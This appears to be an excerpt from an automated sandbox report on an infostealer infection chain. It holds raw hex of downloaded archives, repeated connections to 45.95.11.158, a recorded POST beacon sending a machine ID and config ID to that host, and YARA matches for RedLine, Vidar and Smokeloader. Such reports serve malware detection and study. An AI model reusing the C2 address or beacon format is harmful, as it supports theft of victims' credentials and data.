ee ec 9e ad dd fe ed 30 5b b8 29 1a 35 6c 1a dc 67 d5 2f 19 36 9b c4 9d 1a 96 0b f7 1d 77 6b bd 12 c9 fd b4 57 12 b9 d7 78 45 92 fb d7 5e a9 e4 fe ad 57 34 b9 2b 87 71 f7 33 e4 7d 6e 76 ba 1e e1 da 70 d6 69 29 6a 96 c0 91 92 04 8d 5b 60 8b ab a7 46 8d ec 2b 70 eb 4b fd 09 2f 72 3e f2 03 08 32 82 21 45 9e f0 d9 81 a2 9c e0 e6 42 71 77 8e 50 02 42 bc 23 fd 1c 80 8e 11 91 a4 90 8c 2b c2 dd b9 db 7e 20 96 7b 1f 8a aa 90 09 a8 a7 31 52 2e a0 c4 22 3b 62 8a 05 54 6c 38 dc 15 02 6a 1b 54 b0 7f 04 45 05 3d 82 f6 ec 88 1e 7d 04 70 8f 3c 22 ff 64 3a 73 35 0d f7 e3 8d 3c 42 d8 56 51 f7 3c d0 f4 a5 93 33 d2 e8 34 78 8e 76 e2 db 0e 6d a6 ae 77 cf 07 f5 56 4c ce e6 32 1e 72 e4 ea 26 04 69 7e 20 5f c4 e4 c2 a2 c2 74 6c 9e 88 6b 33 c9 d7 fa b0 7c 99 b9 f9 90 11 db 8e 34 a0 24 70 ef 78 20 5f d4 23 9a f8 bf 7f ff 07 7f 05 63 e1 52 07 17 41 33 3e 6d 1d 07 97 88 f1 18 f7 18 26 fb 40 d0 e1 65 2b 5e 76 e2 65 3f 5e 2a f0 52 87 17 f9 44 b8 28 f0 12 81 97 7a bc c8 26 61 2a 5e a8 c9 f8 8a 97 a5 78 69 56 62 09 3f 4c 40 e6 56 04 23 bc 10 7c d5 e0 13 5e a8 50 2c 11 86 25 f0 52 81 97 7a bc 50 28 1d a5 78 59 1a 81 88 47 63 02 5e 28 2d 56 8e 97 02 f2 14 83 38 e3 65 29 5e b6 e2 85 9a 86 f5 e2 25 02 2f 4b f1 a2 98 8e f0 66 22 a6 78 69 c6 0b 35 0b f3 e1 25 02 2f a5 e4 35 0e d1 c0 4b c1 3b 18 87 97 ad 78 d9 8f 97 0a f2 f4 2e e6 7b 0f 81 e2 25 02 2f 4b f1 52 40 5e f7 61 09 bc d4 e1 85 68 96 f1 70 11 b4 e3 45 b4 1f 2e 8a fd 08 0a 2f e2 8f b0 ec c7 48 6c bc c8 3f 41 a0 78 89 c7 cb 8b 78 a1 3e 85 12 05 07 91 4c 5f 20 0d ea 10 fc 59 7c fd 1e 9f ae 60 63 7e c2 b2 bf 20 a8 7a c4 e0 37 c4 05 2f 4b 7f 87 b2 3b f1 52 f7 3b 26 b0 08 0a 55 81 ce 82 55 5a 1e e0 0f d4 7e a5 72 4a 06 99 64 0a 07 81 ac 14 02 c5 75 b6 6c af 3b 25 6b 80 20 f7 a0 64 b2 a1 94 cc 1b 42 04 84 79 10 68 08 fb 20 fe 10 84 0a 08 a7 20 5c 82 d0 00 a1 19 02 35 90 92 49 20 b8 43 f0 82 30 1e 82 1f 84 b0 81 9c d6 8c 80 7b 2c 04 1d 84 79 10 e6 43 58 0c 61 29 84 0c 08 7a 08 b9 10 56 43 58 07
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Aug 2022 16:27:51 GMTContent-Type: application/zipContent-Length: 3642574Last-Modified: Mon, 04 Jul 2022 10:49:28 GMTConnection: keep-aliveETag: "62c2c5b8-3794ce"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b fc b5 00 00 48 47 01 00 10 00 1c 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 55 54 09 00 03 b0 6f 71 61 b0 6f 71 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec fd 0b 40 54 d5 bb 38 0c ef 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 20 02 c1 1e d4 14 45 07 ca 71 37 e5 af ac ac ac 34 ad 9f 95 95 95 99 99 19 88 09 98 29 5e 32 4b 2b 34 aa 4d 43 8a 4a 80 4a ce f7 3c 6b ef 81 01 c5 73 ce ff 7d cf 7b be f7 fb 0e ba f6 65 5d 9e f5 ac 67 3d b7 b5 f6 5a 6b e2 16 6e a5 84 14 45 89 20 58 ad 14 75 88 e2 fe 22 a8 ff f8 af 19 82 db 88 c3 6e d4 81 3e df 8e 3c 24 98 f5 ed c8 79 fa ec 22 79 41 61 fe f2 c2 b4 95 f2 f4 b4 bc bc 7c 5a be 2c 53 5e 68 c8 93 67 e7 c9 a3 e7 24 c8 57 e6 67 64 4e 76 75 75 f1 e6 61 08 ee ec 9e ad dd fe ed 30 5b b8 29 1a 35 6c 1a dc 67 d5 2f 19 36 9b c4 9d 1a 96 0b f7 1d 77 6b bd 12 c9 fd b4 57 12 b9 d7 78 45 92 fb d7 5e a9 e4 fe ad 57 34 b9 2b 87 71 f7 33 e4 7d 6e 76 ba 1e e1 da 70 d6 69 29 6a 96 c0 91 92 04 8d 5b 60 8b ab a7 46 8d ec 2b 70 eb 4b fd 09 2f 72 3e f2 03 08 32 82 21 45 9e f0 d9 81 a2 9c e0 e6 42 71 77 8e 50 02 42 bc 23 fd 1c 80 8e 11 91 a4 90 8c 2b c2 dd b9 db 7e 20 96 7b 1f 8a aa 90 09 a8 a7 31 52 2e a0 c4 22 3b 62 8a 05 54 6c 38 dc 15 02 6a 1b 54 b0 7f 04 45 05 3d 82 f6 ec 88 1e 7d 04 70 8f 3c 22 ff 64 3a 73 35 0d f7 e3 8d 3c 42 d8 56 51 f7 3c d0 f4 a5 93 33 d2 e8 34 78 8e 76 e2 db 0e 6d a6 ae 77 cf 07 f5 56 4c ce e6 32 1e 72 e4 ea 26 04 69 7e 20 5f c4 e4 c2 a2 c2 74 6c 9e 88 6b 33 c9 d7 fa b0 7c 99 b9 f9 90 11 db 8e 34 a0 24 70 ef 78 20 5f d4 23 9a f8 bf 7f ff 07 7f 05 63 e1 52 07 17 41 33 3e 6d 1d 07 97 88 f1 18 f7 18 26 fb 40 d0 e1 65 2b 5e 76 e2 65 3f 5e 2a f0 52 87 17 f9 44 b8 28 f0 12 81 97 7a bc c8 26 61 2a 5e a8 c9 f8 8a 97 a5 78 69 56 62 09 3f 4c 40 e6 56 04 23 bc 10 7c d5 e0 13 5e a8 50 2c 11 86 25 f0 52 81 97 7a bc 50 28 1d a5 78 59 1a 81 88 47 63 02 5e 28 2d 56 8e 97 02 f2 14 83 38 e3 65 29 5e b6 e2 85 9a 86 f5 e2 25 02 2f 4b f1 a2 98 8e f0 66 22 a6 78 69 c6 0b 35 0b f3 e1 25 02 2f a5 e4 35 0e d1 c0 4b c1 3b 18 87 97 ad 78 d9 8f 97 0a f2 f4 2e e6 7b 0f 81 e2 25 02 2f 4b f1 52 40 5e f7 61 09 bc d4 e1 85 68 96 f1 70 11 b4 e3 45 b4 1f 2e 8a fd 08 0a 2f e2 8f b0 ec c7 48 6c bc c8 3f 41 a0 78 89 c7 cb 8b 78 a1 3e 85 12 05 07 91 4c 5f 20 0d ea 10 fc 59 7c fd 1e 9f ae 60 63 7e c2 b2 bf 20 a8 7a c4 e0 37 c4 05 2f 4b 7f 87 b2 3b f1 52 f7 3b 26 b0 08 0a 55 81 ce 82 55 5a 1e e0 0f d4 7e a5 72 4a 06 99 64 0a 07 81 ac 14 02 c5 75 b6 6c af 3b 25 6b 80 20 f7 a0 64 b2 a1 94 cc 1b 42 04 84 79 10 68 08 fb 20 fe 10 84 0a 08 a7 20 5c 82 d0 00 a1 19 02 35 90 92 49 20 b8 43 f0 82 30 1e 82 1f 84 b0 81 9c d6 8c 80 7b 2c 04 1d 84 79 10 e6 43 58 0c 61 29 84 0c 08 7a 08 b9 10 56 43 58 07
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Aug 2022 16:28:49 GMTContent-Type: application/zipContent-Length: 3642574Last-Modified: Mon, 04 Jul 2022 10:49:28 GMTConnection: keep-aliveETag: "62c2c5b8-3794ce"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b fc b5 00 00 48 47 01 00 10 00 1c 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 55 54 09 00 03 b0 6f 71 61 b0 6f 71 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec fd 0b 40 54 d5 bb 38 0c ef 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 20 02 c1 1e d4 14 45 07 ca 71 37 e5 af ac ac ac 34 ad 9f 95 95 95 99 99 19 88 09 98 29 5e 32 4b 2b 34 aa 4d 43 8a 4a 80 4a ce f7 3c 6b ef 81 01 c5 73 ce ff 7d cf 7b be f7 fb 0e ba f6 65 5d 9e f5 ac 67 3d b7 b5 f6 5a 6b e2 16 6e a5 84 14 45 89 20 58 ad 14 75 88 e2 fe 22 a8 ff f8 af 19 82 db 88 c3 6e d4 81 3e df 8e 3c 24 98 f5 ed c8 79 fa ec 22 79 41 61 fe f2 c2 b4 95 f2 f4 b4 bc bc 7c 5a be 2c 53 5e 68 c8 93 67 e7 c9 a3 e7 24 c8 57 e6 67 64 4e 76 75 75 f1 e6 61 08 ee ec 9e ad dd fe ed 30 5b b8 29 1a 35 6c 1a dc 67 d5 2f 19 36 9b c4 9d 1a 96 0b f7 1d 77 6b bd 12 c9 fd b4 57 12 b9 d7 78 45 92 fb d7 5e a9 e4 fe ad 57 34 b9 2b 87 71 f7 33 e4 7d 6e 76 ba 1e e1 da 70 d6 69 29 6a 96 c0 91 92 04 8d 5b 60 8b ab a7 46 8d ec 2b 70 eb 4b fd 09 2f 72 3e f2 03 08 32 82 21 45 9e f0 d9 81 a2 9c e0 e6 42 71 77 8e 50 02 42 bc 23 fd 1c 80 8e 11 91 a4 90 8c 2b c2 dd b9 db 7e 20 96 7b 1f 8a aa 90 09 a8 a7 31 52 2e a0 c4 22 3b 62 8a 05 54 6c 38 dc 15 02 6a 1b 54 b0 7f 04 45 05 3d 82 f6 ec 88 1e 7d 04 70 8f 3c 22 ff 64 3a 73 35 0d f7 e3 8d 3c 42 d8 56 51 f7 3c d0 f4 a5 93 33 d2 e8 34 78 8e 76 e2 db 0e 6d a6 ae 77 cf 07 f5 56 4c ce e6 32 1e 72 e4 ea 26 04 69 7e 20 5f c4 e4 c2 a2 c2 74 6c 9e 88 6b 33 c9 d7 fa b0 7c 99 b9 f9 90 11 db 8e 34 a0 24 70 ef 78 20 5f d4 23 9a f8 bf 7f ff 07 7f 05 63 e1 52 07 17 41 33 3e 6d 1d 07 97 88 f1 18 f7 18 26 fb 40 d0 e1 65 2b 5e 76 e2 65 3f 5e 2a f0 52 87 17 f9 44 b8 28 f0 12 81 97 7a bc c8 26 61 2a 5e a8 c9 f8 8a 97 a5 78 69 56 62 09 3f 4c 40 e6 56 04 23 bc 10 7c d5 e0 13 5e a8 50 2c 11 86 25 f0 52 81 97 7a bc 50 28 1d a5 78 59 1a 81 88 47 63 02 5e 28 2d 56 8e 97 02 f2 14 83 38 e3 65 29 5e b6 e2 85 9a 86 f5 e2 25 02 2f 4b f1 a2 98 8e f0 66 22 a6 78 69 c6 0b 35 0b f3 e1 25 02 2f a5 e4 35 0e d1 c0 4b c1 3b 18 87 97 ad 78 d9 8f 97 0a f2 f4 2e e6 7b 0f 81 e2 25 02 2f 4b f1 52 40 5e f7 61 09 bc d4 e1 85 68 96 f1 70 11 b4 e3 45 b4 1f 2e 8a fd 08 0a 2f e2 8f b0 ec c7 48 6c bc c8 3f 41 a0 78 89 c7 cb 8b 78 a1 3e 85 12 05 07 91 4c 5f 20 0d ea 10 fc 59 7c fd 1e 9f ae 60 63 7e c2 b2 bf 20 a8 7a c4 e0 37 c4 05 2f 4b 7f 87 b2 3b f1 52 f7 3b 26 b0 08 0a 55 81 ce 82 55 5a 1e e0 0f d4 7e a5 72 4a 06 99 64 0a 07 81 ac 14 02 c5 75 b6 6c af 3b 25 6b 80 20 f7 a0 64 b2 a1 94 cc 1b 42 04 84 79 10 68 08 fb 20 fe 10 84 0a 08 a7 20 5c 82 d0 00 a1 19 02 35 90 92 49 20 b8 43 f0 82 30 1e 82 1f 84 b0 81 9c d6 8c 80 7b 2c 04 1d 84 79 10 e6 43 58 0c 61 29 84 0c 08 7a 08 b9 10 56 43 58 07
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.95.11.158
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 45.95.11.158Content-Length: 97Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 65 6e 67 69 6e 65 65 72 26 63 6f 6e 66 69 67 49 64 3d 37 36 34 32 36 63 33 66 33 36 32 66 35 61 34 37 61 34 36 39 66 30 65 39 64 38 62 63 33 65 65 66 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=76426c3f362f5a47a469f0e9d8bc3eef
                    Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.6:49787 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49823 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.6:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49920 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49942 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.6:50102 version: TLS 1.2
                    Source: F0geI.exe, 0000000E.00000002.462135650.00000000006CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 23.0.safert44.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.0.safert44.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: 31.2.WW1.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 26.0.brokerius.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 22.0.real.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 22.2.real.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 31.0.WW1.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 0.3.q1wLT3xKiY.exe.45ed014.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 0.3.q1wLT3xKiY.exe.45ed014.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 26.2.brokerius.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: 25.0.jshainx.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.0.jshainx.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: 0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 00000017.00000000.313593133.0000000000422000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 00000000.00000003.268213249.0000000004570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 0000000E.00000002.459641391.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: Process Memory Space: real.exe PID: 5308, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: Process Memory Space: brokerius.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: Process Memory Space: WW1.exe PID: 7760, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, type: DROPPEDMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, type: DROPPEDMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0042600014_2_00426000
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0042522014_2_00425220
                    Source: q1wLT3xKiY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: q1wLT3xKiY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: captain09876.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: captain09876.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: captain09876.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ordo_sec666.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ordo_sec666.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ordo_sec666.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: F0geI.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kukurzka9000.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: sqlite3.dll.14.drStatic PE information: Number of sections : 18 > 10
                    Source: q1wLT3xKiY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 23.0.safert44.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.0.safert44.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: 31.2.WW1.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 26.0.brokerius.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 22.0.real.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 22.2.real.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 31.0.WW1.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 0.3.q1wLT3xKiY.exe.45ed014.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
